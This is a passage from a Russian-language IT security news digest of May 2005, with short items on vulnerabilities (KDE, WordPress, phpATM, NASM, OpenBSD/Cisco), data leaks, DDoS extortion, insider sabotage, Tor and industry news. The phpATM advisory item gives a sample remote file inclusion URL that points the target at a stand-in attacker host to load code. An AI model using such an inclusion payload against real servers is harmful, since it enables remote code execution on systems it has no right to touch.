Для устранения опасной уязвимости в безопасности популярной открытой графической среды для UNIX/Linux-систем KDE, обнаруженной около месяца назад, придется установить еще один патч. Проблема возникла в kdelibs, а точнее, в компоненте kimgio при обработке изображений в формате PCX. Kimgio исподьзуется в основанных на KHTML браузерах, а также таких KDE-приложениях, как kpresenter и ksnapshot. Уязвимость затрагивает версии KDE с 3.2 до 3.4 и позволяет злоумышленнику исполнять код, который может привести к получению контроля над системой. Патчи, вышедшие месяц назад, устранили основную часть проблемы, однако локальные пользователи до сих пор могут воспользоваться уязвимостью через файлы, хранящиеся во временном каталоге /tmp. Кроме того, проект KDE сообщил об обнаружении новой ошибки, связанной с проблемой совместимости с изображениями в формате RGB. Новый патч для KDE уже выпущен.
Nixp.Ru

22/05/2005 15:45 На Microsoft подали в суд из-за Excel
Carlos Armando Amado утверждает, что в 1990 году запатентовал технологию, которая позволяла обмениваться данными между Excel и Access через крупноформатные таблицы. Через два года он втретился с представителями Microsoft с целью продать технологию. По словам истца, Microsoft начал использовать такую технологию в программе Access выпуска 1995 - 2002 годов. Microsoft отвергает эти заявления, говоря, что разработки данной технологии начались в 1989 - за три года до встречи с Amado. Адвокаты Amado сообщили, что будут требовать $2 доллара за каждую проданную копию программного обеспечения, что в общей сложности составляет около $500 миллионов долларов. Дело рассматривает Окружной суд в Центральной Калифорнии. Кроме этого, Microsoft судится по патентам на Longhorn, следующего поколения ОС Windows, с компанией Alacritech. Истцом является и Forgent Networks, которая утверждает, что софтверный гигант нарушает их патент на компрессию JPEG изображений.
Источник

22/05/2005 15:12 База данных Центробанка снова в продаже
За 3000 рублей можно купить информацию о банковских проводках за четвертый квартал 2004 года на трех DVD. По данным "Ведомостей", после первых публикаций сотрудникам банка отключили записывающие устройства в компьютерах - дисководы, USB-подключения и прочее. "Два месяца назад была введена новая система защиты и доступа", - говорит сотрудник ЦБ, по словам которого "обрывки баз могут появляться в продаже, но не далее чем за март 2005 года". По словам источника в ЦБ, внутреннее расследование не выявило виновных внутри банка, а его результаты ЦБ предоставил силовикам. Проверку по факту утечки сейчас ведет ФСБ, заявил "Ведомостям" близкий к следствию источник.
Подробнее

22/05/2005 14:46 Компании готовы платить организаторам DDoS-атак
Преступники все чаще атакуют корпоративные интернет-ресурсы посредством DDoS-атак не с целью выведения из строя сетей, а для вымогательства денег. При этом компании предпочитают выполнять требования преступников, а не ликвидировать последствия удачных DDoS-атак, пишет сайт Computerworld. Несмотря на то, что информация о преступлениях подобного рода распространяется уже в течение нескольких лет, большинство компаний отказываются сообщать о DDoS-атаках и принимать помощь правоохранительных органов. «Вымогательство распространяется все шире. Это случается с такой частотой, что теперь даже никто и бровью не ведет», — комментирует ситуацию руководитель подразделения информацию информационной безопасности компании AT&T Эд Амрозо (Ed Amoroso). «За последние 8 месяцев мы видели рост активности многих организованных преступных групп, пытающихся выманить деньги пользователей. Мы делаем все возможное, чтобы помочь клиентам справиться с этой проблемой, но оставляем на их совести обращение в полицию», — рассказал представитель компании MCI Inc, представляющей услуги в области информационной безопасности. Приводить точную статистику о преступлениях, связанных с интернет-вымогательством тяжело, потому что ФБР, провайдеры и исследовательские компании не представляют сведений о процентах «денежных» DDoS-атак. По словам пресс-секретаря ФБР Пола Брессона, его ведомство активно расследует случаи вымогательства с применением DDoS-атак. «Большинство этих преступных групп имеют международные связи. Зафиксировано не так много случаев, в которых атаки идут из США, и много случаев, когда для законов других государств эти преступления оказываются новыми», — рассказал Брессон. Многие жертвы вымогателей предпочитают платить деньги, чтобы избежать дурной молвы. Законы не запрещают платить вымогателям, и компании делают это, потому что ликвидировать последствия атак для них будет дороже. Для выхода из ситуации лучшим решением для компаний станет отказ от выплат вымогателям. Услуги AT&T и MCI по защите от DDoS-атак стоят около 12 тысяч долларов в месяц. С помощью программы Cisco Riverhead gear и утилит Arbor Networks удается отфильтровать до 99 процентов DDoS-трафика, утверждает аналитик компании Gartner Джон Пескаторе.
VirusList

22/05/2005 14:03 Уволенный инженер «Сферы Телеком» попался на шантаже
Уволенный инженер компании «Сфера Телеком» зашифровал базы данных в своем проекте и шантажировал бывшего работодателя, требуя денег. Типичный для России конфликт был решен с помощью РУБОП и ФСБ. Компания «Сфера Телеком», осуществляющая деятельность по системной интеграции, безопасности и комплексному обслуживанию IT-систем корпоративных клиентов, была замешана в историю, достойную настоящего детектива. В ночь с 23 на 24 апреля уволенный за недобросовестное отношение к обязанностям сотрудник «Сфера Телеком» Сенин Д. В. решил навредить своим бывшим работодателям. Инженер Сенин занимался построением сложных серверных узлов и объединением территориально-распределенных филиальных сетей клиентов на базе оборудования Cisco и IBM. Один из таких комплексных проектов находился на этапе сдачи на стороне клиента, крупной авиатранспортной компании. После того как Сенин был уволен, сотрудники «Сфера Телеком» изменили все пароли доступа к узлам, однако инженер нашел себе сообщника на стороне клиента и сумел, проникнув в закрытую область данных компании, зашифровать и заблокировать паролем доступ к базам данных бухгалтерского и управленческого учета, тем самым блокировав производственный процесс авиакомпании. Происшедшее вскрылось в понедельник утром, когда сотрудники авиакомпании пришли на работу. Действовать нужно было немедленно. Связавшись с руководством компании «Сфера Телеком», владельцы авиакомпании попытались совместными усилиями получить необходимый для разблокирования баз пароль у Сенина путем переговоров, но безрезультатно. Он требовал выкуп (возможно, невыплаченную зарплату). Руководители «Сфера Телеком» согласились сделать это, назначили встречу и обратились в ФСБ. К вечеру того же дня владельцами обеих компаний совместно с силами РУБОП и ФСБ была спланирована операция задержания Сенина. На следующее утро генеральный директор «Сферы Телеком», снабженный микрофонами, встретился с инженером для передачи денег. Получив деньги, хакер сообщил пароль, и работа авиакомпании была восстановлена. Деньги же оказались мечеными и сразу после их передачи сотрудники правоохранительных органов провели задержание.
"Вебпланета"

22/05/2005 13:31 Tor: распределенная система анонимного серфинга
Анонимайзер Tor был создан в исследовательской лаборатории Военно-морских сил США по федеральному заказу, но сейчас разработкой американских военных могут пользоваться все желающие. Система Tor обеспечивает высочайший уровень приватности во время серфинга в интернете, в чате и при отправке мгновенных сообщений через интернет-пейджер. Каждый пакет, попадающий в систему, проходит через три различных прокси-сервера (нода), которые выбираются случайным образом. Перед отправлением пакет последовательно шифруется тремя ключами: сначала для третьей ноды, потом для второй, и, в конце концов, для первой. Когда первая нода получает пакет, она расшифровывает «верхний» слой шифра (аналогия с тем, как чистят луковицу) и узнает, куда отправить пакет дальше. Второй и третий сервер поступают аналогичным образом. Учитывая, что все ноды выбираются случайным образом, такая система максимально затрудняет отслеживание источника. Принцип использования распределенной сети анонимайзеров на порядок повышает уровень приватности по сравнению с обычными отдельными анонимайзерами, которые существуют в интернете уже довольно длительное время. Кроме того, Tor совершенно бесплатен. Распределенная система для обеспечения приватного серфинга была спроектирована в конце 90-х гг. по заказу правительства США. В 2002 г. эту разработку решили рассекретить, а исходные коды были переданы независимым разработчикам, которые создали клиентское ПО и опубликовали исходный код под свободной лицензией, чтобы все желающие могли проверить его на отсутствие багов и «закладок». К сожалению, даже открытые исходники клиентского ПО не дают абсолютной гарантии приватности, потому что слежка может осуществляться прямо на сервере, через который проходит трафик.
Подробнее о системе

22/05/2005 12:53 "Яндекс" выпустил антиспамовый фильтр
Компания «Яндекс» выпустила новый продукт под названием «Спамооборона», предназначенный для фильтрации спама в корпоративных почтовых системах. Работа «Спамообороны» основывается на статистике, собираемой на «Яндекс.Почте». Устойчивость «Спамообороны» к новым видам спама обеспечивается автоматическим обновлением базы признаков. Серверное решение работает на операционных системах FreeBSD и Linux и поддерживает такие почтовые серверы как Sendmail, CommunigatePro и Qmail. Продукт поступает в продажу с 19 мая. Защита почты обойдется около $1 за 1 ящик в месяц.
CNews

22/05/2005 12:26 Студент выпустил SP2 для Windows 98 SE
Пользователи Windows 98 Second Edition, обделенные программной поддержкой со стороны Microsoft, теперь могут приобрести service pack от турецкого студента, занимающегося компьютерными разработками, сообщает Computer Weekly. Алпер Коскан (Alper Coskun) представил свою 2-ю версию неофициального обновления Windows 98 SE Service Pack. Компания Microsoft никогда не выпускала SP для Windows 98 SE и закончила предоставлять бесплатную поддержку операционной системы в 2003 году. Сокан выпустил 1-ю бесплатную версию SP год назад. Новая «заплата» Коскана устраняет более 100 изъянов. Cуществуют также локализованные версии сервис-пака. Так, сервис-пак для русской версии Windows 98 SE проживает по адресу egorz.nm.ru, версия 1.6.1 занимает 12 мегабайт.
Cайт Алпера Коскана
Русская версия SP

22/05/2005 12:01 Обход защиты в Apple Mac OS X скринсейвере
Проблема появляется, когда пользователь блокирует экран. Когда скринсейвер стоит в режиме запрашивания пароля и пользователь начинает разблокировку, контекстные меню становятся доступны в режиме введения текста. Атакующий может частично обойти блокировку и отображать нежелательные веб сайты. Уязвимыми являются версии Apple Mac OS X 10.4, Apple Mac OS X Server 10.4. Для обоих версий выпущены обновления - Apple Upgrade MacOSXSvrUpdate.
Подробности

22/05/2005 11:38 SQL-инъекция в Wordpress
Наиболее опасной уязвимостью релиза 1.5 является SQL инъекция в `wp-trackback.php', которую не так просто использовать, потому что вы не получите результата на правильные запросы.Однако присутствует возможность брутфорса различных значений в таблицах - например, хэшей паролей. Параметр `tb_id' файла `wp-trackback.php' некорректно подтверждается, а также, отсутствуют кавычки в SQL-запросах,что позволит вставку SQL-команд. Уязвимость присутствует в версии 1.5 и ранее и устранена в версии 1.5.1.
Подробности

22/05/2005 10:01 Уязвимость в phpATM
phpATM позволяет осуществить выполнение произвольного кода через удаленные инъекции, при условии установленного allow_url_fopen. Лист глобальных переменных $include_location используется с include() и может быть использован атакующим для запуска любого кода с привилегиями веб-пользователя. Проблема в безопасности находится в файле `include/common.php' рядом со строкой 91, где содержимое суперглобальных массивов переведено в глобальный контекст. Этим можно воспользоваться для переписывания ранее объявленной $include_location. Уязвимость подтверждена в версии 1.21, возможно наличие её и в более ранних. Пример атаки - http://victim/index.php?include_location=http://attacker/
Описание

22/05/2005 09:47 Финальная версия Netscape 8 вышла с критическими дырами
В финальной версии браузера Netscape 8, вышедшей в минувший четверг, содержатся критические уязвимости, которые могут приводить к несанкционированному выполнению произвольного вредоносного кода на компьютере пользователя. Особенностью Netscape 8 является наличие двух движков - Trident, на котором основан Internet Explorer 6, и Gecko, используемого во всех версиях Mozilla и, в частности, Firefox. На веб-сайте разработчиков говорится, что Netscape 8 предоставляет пользователям такой выбор различных опций безопасности, какого больше нет ни в одном браузере. Действительно, Netscape 8 автоматически настраивает установки безопасности в соответствии с поставляемыми разработчиками "чёрными списками" веб-сайтов, через которые орудуют фишеры, распространяется шпионское ПО и т.д. Кроме того, браузер имеет цветовую индикацию уровня безопасности посещаемых сайтов. Однако программисты Mozilla Foundation указывают на то, что Netscape 8 далеко не так безопасен, как об этом говорят его создатели. Дело в том, что в Netscape 8 применен тот же движок, что и в Firefox 1.0.3. А в последнем не так давно были выявлены две очень опасные дыры, обеспечивающие возможность проведения XSS-атак (Cross-Site Scripting) и выполнения вредоносных операций на удаленном компьютере. Разработчики Firefox достаточно быстро устранили уязвимости, выпустив версию браузера с индексом 1.0.4. А вот в Netscape 8 эти дыры остались.
Подробности

22/05/2005 09:15 VeriSign усилит инфраструктуру Сети
Компания VeriSign планирует существенно увеличить число своих DNS-серверов, что должно сделать ключевую часть инфраструктуры интернета более устойчивой к кибератакам. В будущем году VeriSign намеревается разместить дополнительные копии своего корневого сервера «J» системы доменных имен (Domain Name System) примерно в сотне вычислительных центров в разных странах. Об этом сообщил в четверг в интервью CNET News.com старший вице-президент VeriSign по инфраструктуре и операциям Аристотель Бало. Два корневых сервера компании (второй называется «А») составляют основу системы имен интернета. Впоследствии машины VeriSign, управляющие трафиком к серверу DNS «J», будут установлены еще более чем в 200 местах. Это отход от первоначальной стратегии нескольких серверов в центральных узлах интернета. В настоящее время у компании имеются копии сервера «J» в 18 городах. «Это расширение обеспечит резервирование и надежность, а главное, защитит от усиливающихся атак, которые мы испытываем», — сказал Бало на ежегодной конференции VeriSign для финансовых аналитиков в Редвуд-Сити (штат Калифорния). Свою расширенную инфраструктуру VeriSign планирует использовать не только для DNS, но и для других своих служб, таких как подтверждение сертификатов SSL (Secure Sockets Layer), которые широко применяются в онлайновой торговле для защиты транзакций. Это может ускорить веб-браузинг, особенно в будущем, когда значение сертификатов повысится. Новые серверы разместятся в Кейптауне, Тайбее, Гонконге, Мадриде, Варшаве, Сан-Паулу, а также в ряде городов Ближнего Востока. Оборудование VeriSign, устанавливаемое в каждом из новых центров, занимает всего около половины стандартной серверной стойки.
Подробнее

21/05/2005 21:13 SAP демонстрирует Mendocino в действии
В четверг производитель корпоративного ПО представил первые примеры бизнес-приложений, разработанных в технологическом партнерстве с Microsoft. На конференции заказчиков SAP Sapphire в Бостоне член правления и один из главных технологов Шай Агасси рассказал о выгодах, которые гигант корпоративных приложений получит от совместного с Microsoft проекта с кодовым названием Mendocino. Первые плоды общих усилий предстали перед участниками конференции в форме специализированной версии Microsoft Outlook, связанной с приложениями планирования корпоративных ресурсов (ERP) SAP. Агасси продемонстрировал, как можно непосредственно в Outlook получать информацию из таких приложений SAP, как система управления проектами или ПО учета кадров. Например, работник вводит в календарь Outlook данные об отработанных им часах, и они попадают прямо в приложение SAP, управляющее бизнес-проектом. Судя по демонстрации Агасси, Mendocino, по существу, представляет собой новую панель задач Outlook для заказчиков, использующих продукты обеих компаний. В другом примере было показано, как, не покидая интерфейса Outlook, можно получить данные, подготовленные аналитическим ПО SAP. Совместно разработанные инструменты появятся в продуктах SAP во втором полугодии будущего года, а с опытными версиями отдельные заказчики смогут ознакомиться в конце 2005 года.
Подробности

21/05/2005 20:32 Нелегальная копия третьей части "Звездных войн" немедленно появилась в Интернете
Через несколько часов после начала мирового проката третьей части легендарной киноэпопеи "Звездные войны" нелегальная копия фильма появилась в Интернете. По данным агентства Reuters, в популярной файлообменной сети BitTorrent возникли как минимум две разных копии фильма. Одна из них содержит рабочий счетчик времени, что свидетельствует о том, что копия была украдена непосредственно из Голливуда, а не переснята видеокамерой в кинотеатре. Производитель фильма компания Lucasfilm официального комментария по этому поводу не дала, однако неофициальные источники агентства сообщили, что ее руководство узнало об утечке еще в среду и сейчас в компании идет разбирательство. Дистрибьютор 20th Century Fox также воздержался от комментариев. Оценку ситуации дали в Ассоциации американских кинопроизводителей MPAA, куда входит большинство кинокомпаний США. Ее президент Дэн Гликман (Dan Glickman) выступил с заявлением, в котором сказал: "Нет лучшего примера того, как воровство портит магию кинематографа, чем нынешний случай с BitTorent, которая предоставила пользователям нелегальные копии "Мести ситха". Печально то, что подобные случаи происходят на регулярной основе в файлообменных сетях во всем мире". Как известно, MPAA пытается противостоять интернет-пиратству, подавая судебные иски против уличенных в пиратстве пользователей в разных странах.
Источник

19/05/2005 14:55 Mail.Ru режет письма от Canon
На официальном сайте Canon-Россия в разделе «Обратная связь» появилось довольно любопытное предостережение. «Уважаемые посетители сайта, почтовая служба Mail.ru периодически помещает адреса @canon.ru в чёрный список. Таким образом, сотрудники Canon лишены возможности отвечать на вопросы тех из Вас, кто пользуется почтовой службой Mail.ru — наши письма не всегда проходят на адреса: @mail.ru, @inbox.ru, @bk.ru, @list.ru. Приносим свои извинения.» Судя по количеству людей, которые пользуются почтой на Mail.Ru, у Canon действительно серьезные проблемы с коммуникацией со своими покупателями.
Источник

19/05/2005 13:49 Солдаты сломали главный компьютер минобороны
Британские солдаты в Ираке на время вывели из строя центральный компьютер министерства обороны Великобритании. Сделали они это по неведению, переслав в Лондон по электронной почте шуточный видеоклип под песенку "Амарилло". Желающих скачать и посмотреть его оказалось так много, что центральный сервер военного ведомства не выдержал. Песенка "Амарилло" в исполнении Тони Кристи несколько недель возглавляла британский хит-парад. С телеэкранов не сходит видеоклип, в котором под нее пляшет комик Питер Кэй. Королевские драгунские гвардейцы на базе "Аль Фао" в Ираке сделали на любительской видеокамере свою пародию, назвав ее "Армадилло". Животное армадил, или броненосец, - это талисман танкистов. На кадрах засняты солдаты в экзотическом виде - кто-то раздобыл арабскую одежду, кто-то просто обмотался полотенцами, кто-то щеголяет в исподнем белье. Самый рискованный эпизод - это когда шутники дружно расселись по уборным, не прикрыв за собой дверцы. Но все трезвы, над иракцами не издеваются и вся забава выглядит вполне невинно. Как объяснил автор клипа сержант Роджер Парр, его сделали просто со скуки. Кто-то из обитателей базы отправил клип в виде приложения к электронному письму военным чиновникам в Лондоне. Те пришли от него в восторг и начали рассказывать о нем знакомым. Служащие в Лондоне стали рассылать знакомым приложение размером в 52 мегабайта. От большого количества скачиваний центральный сервер минобороны не выдержал. Электронная почта по всему ведомству оказалась парализована на несколько часов.
BBC

19/05/2005 12:16 Уязвимости в OpenBSD и CISCO
Разработчики ОС OpenBSD сообщают о выпуске патча для версий 3.5 и 3.6 этой популярной ОС. Патчи связаны с устранением уязвимости в обработке опции временных меток (Timestamp) TCP-пакета. Атакующий способен, сформировав специальный пакет, вызвать DoS активной TCP-сессии, ооднако для этого ему необходимы знания об IP-адресах обоих сторон соединения. В версии OpenBSD уязвимость не существует. Подобная же уязвимость существует в ряде продуктов CISCO (роутеры и свичи SN5400, CSS11000, AP350, AP1200, MGX). CISCO также выпущен бюллетень по безопасности.
OpenBSD
Бюллетень от CISCO

19/05/2005 11:50 Nokia выпускает исправления
Спустя полгода с лишним после обнародования информации о так называемом bluesnarfing - уязвимости, допускающей чтение, модификацию и копирование через BlueTooth адресной книги или календаря на ряде своих телефонов, Nokia объявила о том, что исправление этой проблемы готово для моделей 6230, 6650, 6810, 6820 и 7200, сообщает bugtraq.ru. Смогут ли пользователи самостоятельно обновлять свои трубки, компания не уточняет.
Подробности

19/05/2005 11:16 Внутренние атаки вызваны желанием отомстить
Сотрудники компаний и организаций, которые наносят вред экономике и безопасности США посредством компьютеров, как правило, руководствуются желанием отомстить работодателю. К такому выводу пришли специалисты Секретной службы Министерства финансов США и координационного центра CERT при университете Карнеги-Меллона, сообщает Associated Press. В ходе исследования, заказанного Министерством внутренней безопасности США, эксперты изучили десятки случаев компьютерного саботажа, произошедших в течение 6 последних лет. Исследование должно было объяснить, что заставляет проверенных сотрудников атаковать IT-структуры и установить, как сильно эти атаки влияют на работу компаний. В большинстве случаев организаторы атак оказались недовольными действующими или бывшими сотрудниками технологических департаментов. Среди способов мести оказывалось удаление важных программ и данных, размещение порноматериалов на сайте работодателя и выведение из строя целых сетей. Значительная часть злоумышленников демонстрировала перед нападением характерные признаки: прогулы, опоздания, споры с коллегами и вульгарное поведение. Почти все «мстители» предпринимали шаги, чтобы скрыть свои идентификационные данные в онлайне, и иногда даже выдавали себя за своих коллег. В числе злоумышленников оказывались люди всех возрастов: от подростков до пенсионеров.
Подробности

19/05/2005 11:00 Госсекреты США утекают через Wi-Fi-сети
Лишь немногие из правительственных организаций США, внедрившие Wi-Fi сети, позаботились об их безопасности, — утверждается в докладе Контрольно-счетной палаты США (Government Accountability Office, GAO), представленном Конгрессу. Из 24 крупнейших правительственных агентств 9 не имеют планов по обеспечению защиты Wi-Fi сетей. В 13 агентствах не установлена защита, а большинство агентств не отслеживают происходящее в своих беспроводных сетях. В процессе проверки сотрудники GAO принимали Wi-Fi сигналы за пределами офисов 6 агентств, другими словами, могли осуществить несанкционированный доступ. В одном из агентств 90 ноутбуков были настроены на автоматический поиск сигнала в эфире, что может привести к нахождению подставного сервера. В докладе не сообщается, какие именно агентства пренебрегают безопасностью. Национальный институт стандартов и технологий потребовал от государственных организаций сначала определиться с безопасностью, а лишь затем «освобождать» свои сети от проводов. Следует удостовериться в том, что правительственные агентства используют шифрование, виртуальные частные сети и другие инструменты защиты, — говорится в докладе. Кроме того, необходим мониторинг внутренних сетей на предмет обнаружения нелегальной активности, а также обучение персонала безопасной работе, сообщает Reuters.
CNews

19/05/2005 10:28 Microsoft предложит карточку покупателя под Windows
В ближайшее время Microsoft представит раннюю версию новой программы для Windows, цель которой — помочь заказчикам в борьбе с изобилием интернет-логинов. К концу мая софтверный гигант планирует выпустить версию technical preview приложения с кодовым названием InfoCard. По словам Майка Нэша, топ-менеджера Microsoft, ответственного за ПО защиты, она будет содержать и другие технологии, нацеленные на то, чтобы облегчить и обезопасить использование цифровых удостоверений личности. Этот выпуск предназначен для разработчиков, которые должны будут делиться с Microsoft своими впечатлениями. Кроме InfoCard, компания планирует выпустить предварительные версии технологий, которые позволят различным системам идентификации, используемым в интернете, взаимодействовать друг с другом. «Изобилие разных систем идентификации — одна из серьезных проблем, с которыми люди сталкиваются ежедневно», — говорит архитектор группы распределенных систем Microsoft Джон Шевчук. На прошлой неделе Microsoft и Sun Microsystems продемонстрировали также ПО «единой точки входа», позволяющее, однажды зарегистрировавшись, пользоваться сетевыми сервисами, которые прежде требовали отдельных процессов аутентификации. InfoCard станет наиболее зримым проектом Microsoft для пользователей ПК. Это будет хранилище идентификационных данных, принимаемых такими онлайновыми службами, как веб-магазины.
Подробности

19/05/2005 09:45 Netscape выпускает браузер с защитой от фишинга
Ожидается, что в четверг Netscape выпустит финальную версию Netscape 8 — веб-браузера, защищающего пользователей от таких онлайновых надувательств, как фишинг. Альфа- и бета-версии нового браузера доступны с февраля. Netscape обещает, что финальная версия, как и предыдущие, будет включать средства усиленной защиты системы в процессе веб-браузинга. Кроме того, у Netscape 8 более наглядный интерфейс, хотя существенных отличий от бета-версии, выпущенной в марте, в нем нет. Представитель Netscape, отделения компании America Online, принадлежащей медиагиганту Time Warner, отказался подтвердить план выпуска браузера в четверг, так что он еще может быть отложен. Этим выпуском Netscape бросает вызов доминирующему браузеру Microsoft Internet Explorer, у которого было много проблем с уязвимостью, и надеется воспользоваться успехом Firefox, браузера с открытым исходным кодом, который вышел в ноябре и был загружен уже 57 млн раз. Последняя бета-версия браузера Netscape 8 автоматически устанавливает параметры защиты, пользуясь списком известных веб-сайтов злоумышленников, тем самым оберегая пользователей от происков фишеров. Netscape обещает, что черный список веб-сайтов, подозреваемых в хостинге шпионского ПО или использовании схем фишинга, будет регулярно обновляться. При посещении какого-нибудь веб-сайта на панели браузера будет зажигаться красный или зеленый сигнал — в зависимости от того, считается ли этот сайт опасным или безопасным.
ZDNet

19/05/2005 09:15 За 5 лет мировой уровень компьютерного пиратства возрастет в два раза
Через пять лет количество используемого контрафактного ПО в мире может составить до двух третей от всего объема ПО по сравнению с одной третью в настоящий момент. Об этом, как передает Reuters, свидетельствуют данные исследования Международной информационной корпорации (IDC) и Альянса коммерческого ПО (BSA). В пятилетний срок расходы на легальные программы, по оценкам исследователей, приблизятся к 300 миллиардам, а на нелицензионные - к 200 миллиардам. Подобный прогноз объясняется стремительным распространением в мире Интернета, с помощью которого стало как никогда просто передавать на расстоянии украденную лицензионную цифровую продукцию. Отмечается, что более половины украденных и распространенных по всему миру программ произведены в странах Евросоюза, США и Канаде. По данным иссдедования, в 2004 году в 87 странах мира было произведено программ на 59 миллиардов долларов, а фактически установлено - на 90 миллиардов. Коэффициент пиратства в Европе, Африке и на Ближнем Востоке за прошлый год упал на 2 процента и составил 39 процентов, в то время как стоимость пиратских программ выросла с 3 до 15,7 миллиардов.
Lenta.Ru

18/05/2005 15:35 В штате Вашингтон принят суровый закон против шпионского ПО
Губернатор штата Вашингтон подписал закон "О шпионском программном обеспечении" (On Regulating Spyware). Закон отличается широким толкованием понятия Spyware и весьма строгими мерами наказания за допущенные нарушения. В частности, закон запрещает "обманным способом" изменение стартовой страницы браузера, перенастройку установленного по умолчанию прокси-сервера или подмену провайдера (речь идёт, очевидно, о "дайлерах", встречающихся на сайтах "для взрослых") и изменение списка закладок в браузере. Запрещено удалённо менять настройки подключения в интернет без ведома пользователей. Естественно, запрещён сбор личной информации "преднамеренно обманными способами" и передача их другим лицам, в том числе, использование троянов и клавиатурных "жучков". К числу незаконных деяний также отнесено и обманное препятствование попыткам пользователя деинсталлировать или дезактивировать программное обеспечение (т.е. программы, которые без вашего ведома снова устанавливаются на компьютер и активируются снова, этим законом однозначно запрещены). Запрещено и обманное уведомление о том, что та или иная программа дезактивирована, если при этом она продолжает работать. Выведение из строя средств защиты - антивирусов, брандмауэеров и антишпионских программ - также запрещается. Тут невольно вспоминается то обстоятельство, что за принятие этого закона активно ратует компания Microsoft, занимающаяся, в частности, разработкой антишпионских программ в силу бешеного разгула spyware, пришедшегося на 2004 год. Обращает на себя внимание и то, что в штате Вашингтон отныне запрещено "открытие многочисленных, последовательных, отдельных рекламных страниц в браузере владельца или оператора компьютера без его, оператора или владельца разрешения, так, что их невозможно закрыть, не выключая компьютер или закрывая браузер".
"Компьюлента"

18/05/2005 14:28 Китай нашел управу на любителей пиратской музыки и видео
С 30 мая в Китае вступает в силу закон, который защищает авторское право в Интернете, сообщает информационное агентство "Синьхуа". Документ был создан совместными усилиями Национального управления по авторскому праву и Министерства информационных технологий. Закон распространяется на сайты, на которых загружается, хранится и скачивается текстовая, аудио и видеоинформация. По новым правилам, если владелец авторских прав заметит, что интернет-сайт использует принадлежающую ему интеллектуальную собственность, то он вправе потребовать от интернет-провайдера убрать копипаст. Закон предусматривает также наказание за нарушение авторских прав. Если провайдер никак не отреагировал на сообщение о нарушении интеллектуальной собственности, то сумма, полученная от ее использования, будет конфискована. Кроме того, нарушителю придется заплатить штраф, который в три раза превысит нелегальный доход. Если размер незаконно нажитого оценить невозможно, то на "пирата" будет налагаться максимальный штраф в размере 100 тысяч юаней (12 тысяч долларов). Закон также предусматривает, что самые серьезные дела, а также дела, связанные с криминалом, будут разбираться в судах.
Подробности

18/05/2005 12:57 Наглядное представление концепции технологий Java
На официальном сайте SUN Microsystems размещена презентация концепции технологий Java, сообщает opennet.ru. Данные представлены в виде Flash-компонента, а так же PDF файла содержащего довольно емкий по размерам документ. В документе наглядно показаны основные технологии Java, их краткое описание и обозначены взаимосвязи. Наименования некоторых технологий содержат ссылки на официальные страницы проектов. Во Flash-компоненте есть так же алфавитный указатель по технологиям. Презентация ориентирована в первую очередь на новичков, но также будет полезна и опытным разработчикам. Распечатанная при 100% масштабировании презентация имеет размер 40.5 на 30.5 дюймов, и будет очень наглядно смотреться в виде плаката на стене.
Презентация

18/05/2005 12:24 Неонацисты проникли в миллионы ПК
Спам все шире используется не только в коммерческих целях, но и для пропаганды экстремальных, экстравагантных, а то и фашистских взглядов, а также в политической борьбе вообще. Это в очередной раз доказали неонацисты. Новый червь разослал в минувшие выходные праворадикальные призывы немецко-фашистского толка на миллионы компьютеров. По мнению экспертов в области компьютерной безопасности, этот факт свидетельствует о том, что спам становится орудием не только мошенников, но и пропагандистов радикальных идей. «Мы наблюдаем тенденцию, в рамках которой авторы червей во все большей степени используют спам не для «впаривания» товаров, но как средство политической пропаганды, - заявил Скотт Чейзин (Scott Chasin), ведущий специалист по технологиям антивирусной компании MX Logic. Chasin и другие эксперты указывают, что сообщения рассылались компьютерами, зараженными новым вариантом червя Sober и превратившимися в платформ для осуществления атак. Объем спама, генерируемого таким образом, оценивается экспертами как «ошеломляющий». «Нас буквально завалило сообщениями от подвергшихся атакам небольших сетей», - заявил Скотт Фендли (Scott Fendley), сотрудник компании Internet Storm Center – службы, отслеживающей онлайновые угрозы. Как сообщает Reuters, в строке «тема» рассылаемых червем сообщений содержится текст на немецком языке, гласящий: «мультикультура = мультикриминал». Само сообщение содержит ссылки на немецкие сайты расистского толка, а также новостные сообщения, отражающие точку зрения противников иммиграции и иммигрантов.
CNews

18/05/2005 12:03 Уязвимость в NASM
Jindrich Novy cообщил об обнаружении уязвимости в NASM - Netwide Assembler, применяемом во многих открытых системах для компиляции файлов на языке Ассемблер. Уязвимость связана с некорректными проверками условий в функции "ieee_putascii()" файла outieee.c (функция vsprintf), что позволяет вызвать переполнение буфера при ассемблировании специальным образом сформированного файла и, в дальнейшем, выполнить произвольный код с привилегиями пользователя, от имени которого запущена программа. Уязвимости подвержены версии 0.98.38 и 0.98.39. В качестве временной меры предосторожности рекомендуется не ассемблировать файлы из сомнительных источников. Автором выпущен патч.
Подробности

18/05/2005 11:49 Конфликт вокруг Java в OpenOffice временно улажен
Конфликт, разгоревшийся между разработчиками открытого пакета офисного программного обеспечения OpenOffice и Фондом свободного ПО (Free Software Foundation - FSF) в связи с подготовкой к выходу второй версии OpenOffice, кажется, пришёл к некоему промежуточному разрешению. Причиной споров стало обширное использование языка Java для усовершенствования функционала OpenOffice. Это обстоятельство, в основе которого лежат сугубо практические причины, вызвало, однако, споры идеологического толка. В дело вмешался Ричард Столлмен, глава FSF и главный пропагандист открытого ПО. Столлмен сделал заявление, в котором прозвучал термин "Java-ловушка" (Java Trap). Суть ловушки, по Столлмену, состоит в том, что использование "закрытых" версий Java для реализации определённых функций в открытом программном пакете могло привести к тому, что разработчики коммерческих версий Java, в первую очередь, Sun Microsystems, могут заявить свои права на OpenOffice. Учитывая, что у истоков сообщества OpenOffice.org стоит как раз Sun Microsystems, и компания эта, согласно Newsforge (и общеизвестным фактам), славится своим непоследовательным отношением к открытому ПО и открытым лицензиям. Вдобавок, в сущности, многие участники проекта OpenOffice.org являются работниками Sun, поэтому Столлмен и его соратники заняли жесткую позицию неслучайно. Столлмен и вовсе предложил написать версию OpenOffice, в которой Java отсутствовала бы полностью. В ответ редактор раздела eWeek Linux & Open Source Стивен Воэн-Николс опубликовал статью, в которой предсказывал появление "развилки" - двух раздельных версий OpenOffice, с Java и без.
Более подробно

18/05/2005 11:23 cAos Linux - альтернатива Fedore Core
cAos Foundation и команда разрабочтиков cAos Linux анонсировали публичный релиз cAos Linux версии 2, сообщает linux.org.ru. Предполагается, что этот дистрибутив будет альтернативой Fedore Core, с более длинным сроком поддержки(3-5 лет) и развитым community.
Сайт проекта

18/05/2005 10:42 Office 12 облегчит связь
